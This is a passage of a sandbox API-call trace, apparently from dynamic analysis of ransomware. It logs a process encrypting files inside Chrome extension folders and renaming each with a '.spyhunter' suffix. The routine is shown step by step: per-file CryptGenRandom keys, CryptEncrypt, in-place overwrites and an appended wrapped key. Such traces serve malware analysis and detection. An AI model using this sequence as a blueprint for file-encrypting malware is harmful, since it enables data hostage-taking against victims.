pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png.spyhunter") returned 151 [0136.068] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png.spyhunter")) returned 1 [0136.069] GetProcessHeap () returned 0x2c0000 [0136.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4cd10 | out: hHeap=0x2c0000) returned 1 [0136.069] GetProcessHeap () returned 0x2c0000 [0136.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0136.069] GetProcessHeap () returned 0x2c0000 [0136.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff3bd8 | out: hHeap=0x2c0000) returned 1 [0136.069] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f580 | out: pbBuffer=0x57f580) returned 1 [0136.069] GetProcessHeap () returned 0x2c0000 [0136.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0136.069] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f578*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f578*=0x30) returned 1 [0136.069] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0136.071] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png") returned 142 [0136.071] StrStrW (lpFirst="icon_128.png", lpSrch=".txt") returned 0x0 [0136.071] GetProcessHeap () returned 0x2c0000 [0136.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0136.071] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f53c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f53c*=0xd47, lpOverlapped=0x0) returned 1 [0136.242] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffff2b9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.242] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xd47, lpNumberOfBytesWritten=0x57f53c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f53c*=0xd47, lpOverlapped=0x0) returned 1 [0136.242] GetProcessHeap () returned 0x2c0000 [0136.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0136.242] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.242] WriteFile (in: hFile=0xec, lpBuffer=0x57f57c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f53c, lpOverlapped=0x0 | out: lpBuffer=0x57f57c*, lpNumberOfBytesWritten=0x57f53c*=0x4, lpOverlapped=0x0) returned 1 [0136.242] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f53c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f53c*=0x30, lpOverlapped=0x0) returned 1 [0136.242] CloseHandle (hObject=0xec) returned 1 [0136.243] GetProcessHeap () returned 0x2c0000 [0136.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.243] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png.spyhunter") returned 152 [0136.243] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png.spyhunter")) returned 1 [0136.243] GetProcessHeap () returned 0x2c0000 [0136.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.243] GetProcessHeap () returned 0x2c0000 [0136.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0136.244] GetProcessHeap () returned 0x2c0000 [0136.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff3d40 | out: hHeap=0x2c0000) returned 1 [0136.245] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f578 | out: pbBuffer=0x57f578) returned 1 [0136.245] GetProcessHeap () returned 0x2c0000 [0136.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0136.245] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f570*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f570*=0x30) returned 1 [0136.245] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0136.246] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json") returned 158 [0136.246] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.246] GetProcessHeap () returned 0x2c0000 [0136.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0136.246] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f534, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f534*=0xce, lpOverlapped=0x0) returned 1 [0136.247] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff32, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.247] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xce, lpNumberOfBytesWritten=0x57f534, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f534*=0xce, lpOverlapped=0x0) returned 1 [0136.247] GetProcessHeap () returned 0x2c0000 [0136.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0136.247] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.247] WriteFile (in: hFile=0xec, lpBuffer=0x57f574*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f534, lpOverlapped=0x0 | out: lpBuffer=0x57f574*, lpNumberOfBytesWritten=0x57f534*=0x4, lpOverlapped=0x0) returned 1 [0136.247] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f534, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f534*=0x30, lpOverlapped=0x0) returned 1 [0136.247] CloseHandle (hObject=0xec) returned 1 [0136.247] GetProcessHeap () returned 0x2c0000 [0136.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.248] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json.spyhunter") returned 168 [0136.248] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_br\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_br\\messages.json.spyhunter")) returned 1 [0136.248] GetProcessHeap () returned 0x2c0000 [0136.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.248] GetProcessHeap () returned 0x2c0000 [0136.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0136.248] GetProcessHeap () returned 0x2c0000 [0136.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc5118 | out: hHeap=0x2c0000) returned 1 [0136.250] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f570 | out: pbBuffer=0x57f570) returned 1 [0136.250] GetProcessHeap () returned 0x2c0000 [0136.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0136.250] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f568*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f568*=0x30) returned 1 [0136.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0136.251] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json") returned 155 [0136.251] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.251] GetProcessHeap () returned 0x2c0000 [0136.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0136.251] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f52c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f52c*=0xd5, lpOverlapped=0x0) returned 1 [0136.252] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff2b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.252] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xd5, lpNumberOfBytesWritten=0x57f52c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f52c*=0xd5, lpOverlapped=0x0) returned 1 [0136.253] GetProcessHeap () returned 0x2c0000 [0136.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0136.253] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.253] WriteFile (in: hFile=0xec, lpBuffer=0x57f56c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f52c, lpOverlapped=0x0 | out: lpBuffer=0x57f56c*, lpNumberOfBytesWritten=0x57f52c*=0x4, lpOverlapped=0x0) returned 1 [0136.253] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f52c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f52c*=0x30, lpOverlapped=0x0) returned 1 [0136.253] CloseHandle (hObject=0xec) returned 1 [0136.253] GetProcessHeap () returned 0x2c0000 [0136.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.254] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json.spyhunter") returned 165 [0136.254] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json.spyhunter")) returned 1 [0136.255] GetProcessHeap () returned 0x2c0000 [0136.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.255] GetProcessHeap () returned 0x2c0000 [0136.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0136.255] GetProcessHeap () returned 0x2c0000 [0136.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc4e08 | out: hHeap=0x2c0000) returned 1 [0136.256] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f568 | out: pbBuffer=0x57f568) returned 1 [0136.256] GetProcessHeap () returned 0x2c0000 [0136.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0136.256] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f560*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f560*=0x30) returned 1 [0136.256] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0136.257] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json") returned 155 [0136.257] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.257] GetProcessHeap () returned 0x2c0000 [0136.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0136.257] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f524, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f524*=0xc3, lpOverlapped=0x0) returned 1 [0136.258] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff3d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.258] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xc3, lpNumberOfBytesWritten=0x57f524, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f524*=0xc3, lpOverlapped=0x0) returned 1 [0136.259] GetProcessHeap () returned 0x2c0000 [0136.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0136.259] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.259] WriteFile (in: hFile=0xec, lpBuffer=0x57f564*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f524, lpOverlapped=0x0 | out: lpBuffer=0x57f564*, lpNumberOfBytesWritten=0x57f524*=0x4, lpOverlapped=0x0) returned 1 [0136.259] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f524, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f524*=0x30, lpOverlapped=0x0) returned 1 [0136.259] CloseHandle (hObject=0xec) returned 1 [0136.259] GetProcessHeap () returned 0x2c0000 [0136.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.259] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json.spyhunter") returned 165 [0136.259] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json.spyhunter")) returned 1 [0136.260] GetProcessHeap () returned 0x2c0000 [0136.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.260] GetProcessHeap () returned 0x2c0000 [0136.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0136.261] GetProcessHeap () returned 0x2c0000 [0136.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc4af8 | out: hHeap=0x2c0000) returned 1 [0136.262] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f560 | out: pbBuffer=0x57f560) returned 1 [0136.262] GetProcessHeap () returned 0x2c0000 [0136.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0136.262] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f558*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f558*=0x30) returned 1 [0136.262] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0136.263] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json") returned 155 [0136.263] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.263] GetProcessHeap () returned 0x2c0000 [0136.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0136.263] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f51c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f51c*=0xd9, lpOverlapped=0x0) returned 1 [0136.264] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff27, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.264] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xd9, lpNumberOfBytesWritten=0x57f51c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f51c*=0xd9, lpOverlapped=0x0) returned 1 [0136.264] GetProcessHeap () returned 0x2c0000 [0136.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0136.264] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.265] WriteFile (in: hFile=0xec, lpBuffer=0x57f55c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f51c, lpOverlapped=0x0 | out: lpBuffer=0x57f55c*, lpNumberOfBytesWritten=0x57f51c*=0x4, lpOverlapped=0x0) returned 1 [0136.265] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f51c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f51c*=0x30, lpOverlapped=0x0) returned 1 [0136.265] CloseHandle (hObject=0xec) returned 1 [0136.265] GetProcessHeap () returned 0x2c0000 [0136.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.265] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json.spyhunter") returned 165 [0136.265] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json.spyhunter")) returned 1 [0136.266] GetProcessHeap () returned 0x2c0000 [0136.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.266] GetProcessHeap () returned 0x2c0000 [0136.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0136.266] GetProcessHeap () returned 0x2c0000 [0136.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc47e8 | out: hHeap=0x2c0000) returned 1 [0136.267] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f558 | out: pbBuffer=0x57f558) returned 1 [0136.267] GetProcessHeap () returned 0x2c0000 [0136.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0136.267] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f550*=0x20, dwBufLen=0x30 | out: 